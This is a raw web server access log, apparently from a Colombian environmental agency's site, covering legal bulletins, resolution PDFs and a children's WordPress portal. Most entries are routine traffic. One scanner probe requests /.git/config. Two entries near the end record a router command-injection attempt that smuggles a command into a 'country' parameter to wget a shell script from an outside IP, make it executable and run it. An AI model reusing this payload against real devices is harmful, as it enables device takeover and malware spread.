172.22.2.4 - - [20/Mar/2024:00:33:36 -0500] "GET /BLA/boletinlegal/apple-touch-icon-precomposed.png HTTP/1.1" 404 1140
172.22.2.4 - - [20/Mar/2024:00:33:36 -0500] "GET /BLA/boletinlegal/apple-touch-icon.png HTTP/1.1" 404 1140
172.22.2.4 - - [20/Mar/2024:00:33:36 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1140
216.245.221.92 - - [20/Mar/2024:00:34:16 -0500] "HEAD / HTTP/1.1" 200 -
216.244.66.195 - - [20/Mar/2024:00:34:19 -0500] "GET /robots.txt HTTP/1.1" 404 1018
201.245.192.253 - - [20/Mar/2024:00:34:22 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 14501
201.245.192.253 - - [20/Mar/2024:00:35:30 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37499
186.102.67.252 - - [20/Mar/2024:00:35:34 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX18Trxk9vdTBI1xXtOtEsTSbPiGWYHfZo4RlB8GpUJjXuQOHKUjMOrIRO1sMcIvisWbDCcpyxBpU5Bn5L0FJXeuOoPtE6g6jZiV/8ROPT496k9C5HhurQ1AX6CVBHeTL9v1D+n8+wfH8zzDmZQz0QKFxG3/LYXNCprC0/E5fvgG5P8DhweZLSMP+tD5X9JaC9yk/1LwchQkWOLj1Wptsu39ks5YM/cbRTmyNgw1Q4YgZlY3VzGDC3MRw8Kdt2ZKcI9/mlcGg2mDJdQ==&u=U2FsdGVkX18OTd+VxDsiYbBOGhzXsLZbk8GcHC6kibfanW8caoKHw6yL7FiRFr04&y=U2FsdGVkX18hUvcaMuytfsQYbCuEVmpFuDfE08afQD0/ApAUOrlIuOdG4tDJ96WG HTTP/1.1" 200 26
186.102.67.252 - - [20/Mar/2024:00:35:35 -0500] "GET /kwssiamovil/sm/acme/a?s=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&u=U2FsdGVkX18OTd+VxDsiYbBOGhzXsLZbk8GcHC6kibfanW8caoKHw6yL7FiRFr04&y=U2FsdGVkX18hUvcaMuytfsQYbCuEVmpFuDfE08afQD0/ApAUOrlIuOdG4tDJ96WG HTTP/1.1" 200 26
186.102.67.252 - - [20/Mar/2024:00:35:35 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX18hLSSEYTAqjw41brk2+bDkfznfr+A96CJUNS30/cnM285glKCh7FuBzFJ0Z8PUyzlxMOaAkfHJBSxtlzsoQPFc5xAVFdMxV99kn9AaVaVqg++ibQysOSDvfjX9RVXOAW6eAFVJc92WuE07Z6/qmq1OKtXwgZNFx2s=&u=U2FsdGVkX18OTd+VxDsiYbBOGhzXsLZbk8GcHC6kibfanW8caoKHw6yL7FiRFr04&y=U2FsdGVkX18hUvcaMuytfsQYbCuEVmpFuDfE08afQD0/ApAUOrlIuOdG4tDJ96WG HTTP/1.1" 200 26
186.102.67.252 - - [20/Mar/2024:00:35:36 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX19PQHBJgZ0Y9q5RMAAVi4VG7Kb/PcpBkY/gKz3ga9KgzvzTVTX5EKowlenPj5yk38kZhS9TtFj3/RMFOzcPHjbS9YHhFagtskIrvDTUVoN91IYxHDxRF2EZuBd4R4BPrZrZJWzdV437AKWXpxn2mWvmM0Nlc8WjH/Q=&u=U2FsdGVkX18OTd+VxDsiYbBOGhzXsLZbk8GcHC6kibfanW8caoKHw6yL7FiRFr04&y=U2FsdGVkX18hUvcaMuytfsQYbCuEVmpFuDfE08afQD0/ApAUOrlIuOdG4tDJ96WG HTTP/1.1" 200 26
186.102.67.252 - - [20/Mar/2024:00:35:36 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1+g5p2Szu9Cy4mbVtD/6zzZ4rm+XLkTYQRD+ukEO070uMn2PFdvecctmeOT39SEZRrTJuM/CXouLGf01XkiItHvHq1LuEnu87N4DKNrWU1IG2lAALR57Stfjq9Nst4IXd+/Q4+q4zRg61GbtRlUjaMDtYln7437P/4=&u=U2FsdGVkX18OTd+VxDsiYbBOGhzXsLZbk8GcHC6kibfanW8caoKHw6yL7FiRFr04&y=U2FsdGVkX18hUvcaMuytfsQYbCuEVmpFuDfE08afQD0/ApAUOrlIuOdG4tDJ96WG HTTP/1.1" 200 26
186.102.67.252 - - [20/Mar/2024:00:35:36 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1/IxGG+E9o5BH/Hn5pXZD94SGsj2DEi/+l7oV2V94oEeGOYhn8RkPHIQg92AiMBojb7gFsn7G1oJykmqTgCtIyBbGq+DkbFBjOZPTy1iPb/0QDpc5KD1z7dUWappxsxMW6fRHkfQXJEEeAkWP07NnCTQgNlbbBtZJ3fzKbVzwcbjk3fVjknwSFDcoLg82WwvIEcGrFCcBcrqQ==&u=U2FsdGVkX18OTd+VxDsiYbBOGhzXsLZbk8GcHC6kibfanW8caoKHw6yL7FiRFr04&y=U2FsdGVkX18hUvcaMuytfsQYbCuEVmpFuDfE08afQD0/ApAUOrlIuOdG4tDJ96WG HTTP/1.1" 200 26
162.55.175.141 - - [20/Mar/2024:00:36:08 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [20/Mar/2024:00:34:30 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [20/Mar/2024:00:36:30 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37499
172.22.2.4 - - [20/Mar/2024:00:35:21 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58273
201.245.192.253 - - [20/Mar/2024:00:39:05 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 37194
201.245.192.253 - - [20/Mar/2024:00:39:05 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 37920
216.245.221.92 - - [20/Mar/2024:00:39:16 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [20/Mar/2024:00:39:37 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 37202
201.245.192.253 - - [20/Mar/2024:00:40:44 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 37920
188.166.43.232 - - [20/Mar/2024:00:40:50 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [20/Mar/2024:00:41:29 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37499
185.242.226.10 - - [20/Mar/2024:00:41:58 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [20/Mar/2024:00:40:20 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [20/Mar/2024:00:41:11 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 43032
172.22.2.4 - - [20/Mar/2024:00:41:14 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [20/Mar/2024:00:41:50 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 50303
216.245.221.92 - - [20/Mar/2024:00:44:16 -0500] "HEAD / HTTP/1.1" 200 -
40.77.167.19 - - [20/Mar/2024:00:44:18 -0500] "GET /BLA/resoluciones/AUTOS%202019/4901.pdf HTTP/1.1" 304 -
216.244.66.195 - - [20/Mar/2024:00:45:28 -0500] "GET /BLA/resoluciones/AUTOS%202021/4188.pdf HTTP/1.1" 200 372528
52.167.144.181 - - [20/Mar/2024:00:45:51 -0500] "GET /BLA/resoluciones/AUTOS%202013/3584.pdf HTTP/1.1" 304 -
66.249.66.165 - - [20/Mar/2024:00:46:00 -0500] "GET /portaldeninos/2018/06/06/hola-mundo-3-2-2/ HTTP/1.1" 200 94319
201.245.192.253 - - [20/Mar/2024:00:46:27 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37499
47.128.16.164 - - [20/Mar/2024:00:47:15 -0500] "GET /portaldeninos/wp-content/themes/betheme/style.css?ver=20.9.6 HTTP/1.1" 200 287
47.128.16.164 - - [20/Mar/2024:00:47:15 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/jplayer/css/jplayer.blue.monday.css?ver=20.9.6 HTTP/1.1" 200 9834
47.128.16.164 - - [20/Mar/2024:00:47:15 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/CSS/totalsoft.css?ver=4.9.8 HTTP/1.1" 200 40622
47.128.16.164 - - [20/Mar/2024:00:47:17 -0500] "GET /portaldeninos/wp-content/themes/betheme/css/responsive.css?ver=20.9.6 HTTP/1.1" 200 55740
47.128.16.164 - - [20/Mar/2024:00:47:15 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/CSS/Total-Soft-Gallery-Video-Widget.css?ver=4.9.8 HTTP/1.1" 200 51554
47.128.16.164 - - [20/Mar/2024:00:47:18 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/animations/animations.min.css?ver=20.9.6 HTTP/1.1" 200 58508
47.128.16.164 - - [20/Mar/2024:00:47:19 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/ui/jquery.ui.all.css?ver=20.9.6 HTTP/1.1" 200 18765
47.128.16.164 - - [20/Mar/2024:00:47:23 -0500] "GET /portaldeninos/wp-content/plugins/popup-maker/assets/css/site.min.css?ver=1.8.14 HTTP/1.1" 200 8260
47.128.16.164 - - [20/Mar/2024:00:47:11 -0500] "GET /portaldeninos/ HTTP/1.1" 200 110175
47.128.16.164 - - [20/Mar/2024:00:47:24 -0500] "GET /portaldeninos/wp-content/uploads/useanyfont/uaf.css?ver=1589905315 HTTP/1.1" 200 408
47.128.16.164 - - [20/Mar/2024:00:47:24 -0500] "GET /portaldeninos/wp-content/plugins/google-analytics-for-wordpress/assets/js/frontend-gtag.min.js?ver=8.5.0 HTTP/1.1" 200 11801
47.128.16.164 - - [20/Mar/2024:00:47:24 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/core.min.js?ver=1.11.4 HTTP/1.1" 200 4000
47.128.16.13 - - [20/Mar/2024:00:47:24 -0500] "GET /robots.txt HTTP/1.1" 404 1035
47.128.16.164 - - [20/Mar/2024:00:47:24 -0500] "GET /portaldeninos/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1 HTTP/1.1" 200 10056
47.128.16.164 - - [20/Mar/2024:00:47:15 -0500] "GET /portaldeninos/wp-content/themes/betheme/css/shortcodes.css?ver=20.9.6 HTTP/1.1" 200 138889
47.128.16.164 - - [20/Mar/2024:00:47:24 -0500] "GET /portaldeninos/wp-content/themes/betheme/css/base.css?ver=20.9.6 HTTP/1.1" 200 57283
47.128.16.164 - - [20/Mar/2024:00:47:25 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/JS/modernizr.custom.js?ver=4.9.8 HTTP/1.1" 200 9019
47.128.16.164 - - [20/Mar/2024:00:47:24 -0500] "GET /portaldeninos/wp-includes/js/jquery/jquery.js?ver=1.12.4 HTTP/1.1" 200 97184
47.128.16.164 - - [20/Mar/2024:00:47:15 -0500] "GET /portaldeninos/wp-content/themes/betheme/css/layout.css?ver=20.9.6 HTTP/1.1" 200 116639
47.128.16.164 - - [20/Mar/2024:00:47:26 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/widget.min.js?ver=1.11.4 HTTP/1.1" 200 6908
47.128.16.164 - - [20/Mar/2024:00:47:26 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/position.min.js?ver=1.11.4 HTTP/1.1" 200 6527
47.128.16.164 - - [20/Mar/2024:00:47:26 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/mouse.min.js?ver=1.11.4 HTTP/1.1" 200 3148
47.128.16.164 - - [20/Mar/2024:00:47:25 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/JS/Total-Soft-Gallery-Video-Widget.js?ver=4.9.8 HTTP/1.1" 200 80264
47.128.16.164 - - [20/Mar/2024:00:47:26 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/tabs.min.js?ver=1.11.4 HTTP/1.1" 200 12110
47.128.16.164 - - [20/Mar/2024:00:47:27 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/animations/animations.min.js?ver=20.9.6 HTTP/1.1" 200 1896
47.128.16.164 - - [20/Mar/2024:00:47:27 -0500] "GET /portaldeninos/wp-includes/js/wp-embed.min.js?ver=4.9.8 HTTP/1.1" 200 1398
47.128.16.164 - - [20/Mar/2024:00:47:26 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/jplayer/jplayer.min.js?ver=20.9.6 HTTP/1.1" 200 52702
47.128.16.164 - - [20/Mar/2024:00:47:27 -0500] "GET /portaldeninos/wp-content/plugins/popup-maker/assets/js/site.min.js?defer&ver=1.8.14 HTTP/1.1" 200 48457
47.128.16.164 - - [20/Mar/2024:00:47:27 -0500] "GET /portaldeninos/wp-content/themes/betheme/js/scripts.js?ver=20.9.6 HTTP/1.1" 200 77162
47.128.16.164 - - [20/Mar/2024:00:47:28 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/accordion.min.js?ver=1.11.4 HTTP/1.1" 200 8584
47.128.16.164 - - [20/Mar/2024:00:47:28 -0500] "GET /portaldeninos/wp-content/themes/betheme/js/menu.js?ver=20.9.6 HTTP/1.1" 200 2449
47.128.16.164 - - [20/Mar/2024:00:47:27 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/sortable.min.js?ver=1.11.4 HTTP/1.1" 200 24899
47.128.16.164 - - [20/Mar/2024:00:47:28 -0500] "GET /portaldeninos/wp-includes/js/wp-emoji-release.min.js?ver=4.9.8 HTTP/1.1" 200 12026
47.128.16.164 - - [20/Mar/2024:00:47:28 -0500] "GET /portaldeninos/wp-content/uploads/2019/08/Logo-Ambientic.png HTTP/1.1" 200 22941
47.128.16.164 - - [20/Mar/2024:00:47:29 -0500] "GET /portaldeninos/wp-content/uploads/2021/06/titulo-miambiente-ni%C3%B1os.png HTTP/1.1" 200 11944
47.128.16.164 - - [20/Mar/2024:00:47:28 -0500] "GET /portaldeninos/wp-content/uploads/2021/06/titulo-cabezote-ni%C3%B1os.png HTTP/1.1" 200 64425
47.128.16.164 - - [20/Mar/2024:00:47:26 -0500] "GET /portaldeninos/wp-content/themes/betheme/js/plugins.js?ver=20.9.6 HTTP/1.1" 200 197151
47.128.16.164 - - [20/Mar/2024:00:47:31 -0500] "GET /portaldeninos/wp-content/uploads/2021/06/titulo-videos-ni%C3%B1os.png HTTP/1.1" 200 10502
47.128.16.164 - - [20/Mar/2024:00:47:31 -0500] "GET /portaldeninos/wp-content/uploads/2021/06/titulo-humedales-ni%C3%B1os.png HTTP/1.1" 200 13361
47.128.16.164 - - [20/Mar/2024:00:47:29 -0500] "GET /portaldeninos/wp-content/uploads/2020/01/Tierra-escenario.jpg HTTP/1.1" 200 181491
47.128.16.164 - - [20/Mar/2024:00:47:29 -0500] "GET /portaldeninos/wp-content/uploads/2018/10/oso.jpg HTTP/1.1" 200 305180
47.128.16.164 - - [20/Mar/2024:00:47:29 -0500] "GET /portaldeninos/wp-content/uploads/2018/11/caneca.jpg HTTP/1.1" 200 262661
47.128.16.164 - - [20/Mar/2024:00:47:33 -0500] "GET /portaldeninos/wp-content/uploads/2020/05/fb.jpg HTTP/1.1" 200 9893
47.128.16.164 - - [20/Mar/2024:00:47:33 -0500] "GET /portaldeninos/wp-content/uploads/2020/05/ig.jpg HTTP/1.1" 200 11470
47.128.16.164 - - [20/Mar/2024:00:47:29 -0500] "GET /portaldeninos/wp-content/uploads/2020/01/Frailejon-escenario.jpg HTTP/1.1" 200 357472
47.128.16.164 - - [20/Mar/2024:00:47:34 -0500] "GET /portaldeninos/wp-content/uploads/2020/06/yt.jpg HTTP/1.1" 200 10577
47.128.16.164 - - [20/Mar/2024:00:47:34 -0500] "GET /portaldeninos/wp-content/uploads/2020/06/tw.jpg HTTP/1.1" 200 11056
47.128.16.164 - - [20/Mar/2024:00:47:34 -0500] "GET /portaldeninos/wp-json/pum/v1/analytics/?event=open&pid=1126&_cache=1710913666809 HTTP/1.1" 204 -
47.128.16.164 - - [20/Mar/2024:00:47:29 -0500] "GET /portaldeninos/wp-content/uploads/2018/11/tigrillo.jpg HTTP/1.1" 200 402961
47.128.16.164 - - [20/Mar/2024:00:47:32 -0500] "GET /portaldeninos/wp-content/uploads/2022/08/Infograf%C3%ADa-humedales-actualizada.png HTTP/1.1" 200 588022
216.244.66.195 - - [20/Mar/2024:00:47:43 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202023/2237.pdf HTTP/1.1" 200 363876
172.22.2.4 - - [20/Mar/2024:00:46:10 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
47.128.16.164 - - [20/Mar/2024:00:47:32 -0500] "GET /portaldeninos/wp-content/uploads/2022/08/HUmedalConejera03-1.jpg HTTP/1.1" 200 1541780
216.244.66.195 - - [20/Mar/2024:00:48:21 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202023/2479.pdf HTTP/1.1" 200 2296655
172.22.2.4 - - [20/Mar/2024:00:47:01 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53818
216.244.66.195 - - [20/Mar/2024:00:49:15 -0500] "GET /BLA/resoluciones/AUTOS%202007/1874.pdf HTTP/1.1" 200 82076
216.245.221.92 - - [20/Mar/2024:00:49:16 -0500] "HEAD / HTTP/1.1" 200 -
216.244.66.195 - - [20/Mar/2024:00:49:45 -0500] "GET /BLA/resoluciones/AUTOS%202007/1896.pdf HTTP/1.1" 200 70903
87.120.84.69 - - [20/Mar/2024:00:50:13 -0500] "GET /.git/config HTTP/1.1" 404 1018
216.244.66.195 - - [20/Mar/2024:00:50:15 -0500] "GET /BLA/resoluciones/AUTOS%202007/1932.pdf HTTP/1.1" 200 66237
216.244.66.195 - - [20/Mar/2024:00:50:43 -0500] "GET /BLA/resoluciones/AUTOS%202010/0428.pdf HTTP/1.1" 200 293411
216.244.66.195 - - [20/Mar/2024:00:51:12 -0500] "GET /BLA/resoluciones/AUTOS%202010/0537.pdf HTTP/1.1" 200 185567
152.61.192.232 - - [20/Mar/2024:00:51:15 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?request=GetCapabilities&service=WMS HTTP/1.1" 503 1020
152.61.192.232 - - [20/Mar/2024:00:51:16 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?SERVICE=WMS&REQUEST=GetCapabilities HTTP/1.1" 503 1020
152.61.192.232 - - [20/Mar/2024:00:51:16 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?WMTVER=1.0.0&REQUEST=capabilities HTTP/1.1" 503 1020
201.245.192.253 - - [20/Mar/2024:00:51:25 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37499
216.244.66.195 - - [20/Mar/2024:00:51:43 -0500] "GET /BLA/resoluciones/AUTOS%202010/0704.pdf HTTP/1.1" 200 187933
216.244.66.195 - - [20/Mar/2024:00:52:12 -0500] "GET /BLA/resoluciones/AUTOS%202010/1079.pdf HTTP/1.1" 200 181809
216.244.66.195 - - [20/Mar/2024:00:52:38 -0500] "GET /BLA/resoluciones/AUTOS%202010/1120.pdf HTTP/1.1" 200 193061
216.244.66.195 - - [20/Mar/2024:00:53:04 -0500] "GET /BLA/resoluciones/AUTOS%202010/1313.pdf HTTP/1.1" 200 530049
51.171.167.226 - - [20/Mar/2024:00:53:05 -0500] "GET /robots.txt HTTP/1.1" 404 1035
216.244.66.195 - - [20/Mar/2024:00:53:28 -0500] "GET /BLA/resoluciones/AUTOS%202010/1470.pdf HTTP/1.1" 200 271233
172.22.2.4 - - [20/Mar/2024:00:52:00 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
13.56.33.4 - - [20/Mar/2024:00:53:51 -0500] "HEAD / HTTP/1.1" 200 -
216.244.66.195 - - [20/Mar/2024:00:54:00 -0500] "GET /BLA/resoluciones/AUTOS%202010/2311.pdf HTTP/1.1" 200 1506897
216.245.221.92 - - [20/Mar/2024:00:54:16 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [20/Mar/2024:00:52:51 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 43983
185.224.128.43 - - [20/Mar/2024:00:54:31 -0500] "GET / HTTP/1.1" 200 319
216.244.66.195 - - [20/Mar/2024:00:54:52 -0500] "GET /BLA/resoluciones/AUTOS%202010/2610.pdf HTTP/1.1" 200 21900
172.22.2.4 - - [20/Mar/2024:00:53:32 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.244.66.195 - - [20/Mar/2024:00:55:22 -0500] "GET /BLA/resoluciones/AUTOS%202010/4270.pdf HTTP/1.1" 200 128443
172.22.2.4 - - [20/Mar/2024:00:54:07 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54913
216.244.66.195 - - [20/Mar/2024:00:55:52 -0500] "GET /BLA/resoluciones/AUTOS%202010/4412.pdf HTTP/1.1" 200 143429
146.19.24.28 - - [20/Mar/2024:00:56:13 -0500] "GET / HTTP/1.1" 200 319
216.244.66.195 - - [20/Mar/2024:00:56:20 -0500] "GET /BLA/resoluciones/AUTOS%202010/4431.pdf HTTP/1.1" 200 1137314
201.245.192.253 - - [20/Mar/2024:00:56:23 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37499
216.244.66.195 - - [20/Mar/2024:00:56:51 -0500] "GET /BLA/resoluciones/AUTOS%202010/4606.pdf HTTP/1.1" 200 401261
216.244.66.195 - - [20/Mar/2024:00:57:20 -0500] "GET /BLA/resoluciones/AUTOS%202010/4806.pdf HTTP/1.1" 200 459655
172.22.2.4 - - [20/Mar/2024:00:57:54 -0500] "GET /BLA/boletinlegal/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F94.156.8.244%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh) HTTP/1.1" 404 1018
172.22.2.4 - - [20/Mar/2024:00:57:54 -0500] "GET /BLA/boletinlegal/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F94.156.8.244%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh) HTTP/1.1" 404 1018
216.244.66.195 - - [20/Mar/2024:00:58:00 -0500] "GET /BLA/resoluciones/AUTOS%202010/5460.pdf HTTP/1.1" 200 507171
216.244.66.195 - - [20/Mar/2024:00:58:31 -0500] "GET /BLA/resoluciones/AUTOS%202010/5500.pdf HTTP/1.1" 200 319781
216.244.66.195 - - [20/Mar/2024:00:59:01 -0500] "GET /BLA/resoluciones/AUTOS%202010/5650.pdf HTTP/1.1" 200 455700
216.245.221.92 - - [20/Mar/2024:00:59:16 -0500] "HEAD / HTTP/1.1" 200 -
216.244.66.195 - - [20/Mar/2024:00:59:30 -0500] "GET /BLA/resoluciones/AUTOS%202010/6146.pdf HTTP/1.1" 200 138137
